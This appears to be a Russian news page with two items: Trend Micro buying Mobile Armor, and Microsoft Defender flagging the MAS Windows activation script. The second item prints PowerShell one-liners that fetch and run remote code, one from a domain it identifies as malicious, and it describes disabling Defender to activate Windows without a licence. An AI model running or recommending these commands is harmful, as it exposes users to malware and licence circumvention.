Trend Micro покупает Mobile Armor

Trend Micro покупает Mobile Armor

Компания-покупатель заявила, что приобретение поставщика криптографических решений позволит ей повысить качество своих средств и систем защиты данных. Сообщается, что Trend Micro планирует поставлять продукты Mobile Armor совместно с собственными разработками в сфере "облачного" шифрования и криптозащиты электронной почты.



Особый интерес для Trend Micro представляет возможность дальнейшего расширения своего присутствия на рынке средств безопасности для "облачных" сред. Компания не так давно сделала первые шаги в этом направлении, запустив в производство платформу SecureCloud; сделка позволит ей продолжать успешное развитие соответствующих продуктов и решений.


Руководитель Trend Micro Ева Чен отметила, что приобретение Mobile Armor откроет управляемой ею компании доступ к новым аспектам рынка информационной безопасности, так что все клиенты - и нынешние, и будущие - смогут воспользоваться теми широкими возможностями, которые предоставляет отлаженная и уже доказавшая свою эффективность технология криптозащиты для смартфонов, ноутбуков и планшетных ПК.


"Решения Mobile Armor открывают для нас новые горизонты в сфере обеспечения безопасности информации вне зависимости от того, где и каким образом она размещается и хранится", - сказала, в частности, г-жа Чен. - "Кроме того, они органично дополнят нашу собственную платформу SecureCloud для защиты и отслеживания "облачных" данных".


Завершение всех операций по сделке ожидается к концу года. Условия ее не разглашаются.


Журналист V3.co.uk напомнил, что рынок корпоративной безопасности уже не впервые наблюдает подобные покупки и слияния - достаточно лишь вспомнить приобретение VeriSign и McAfee компаниями Symantec и Intel соответственно.

" />

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru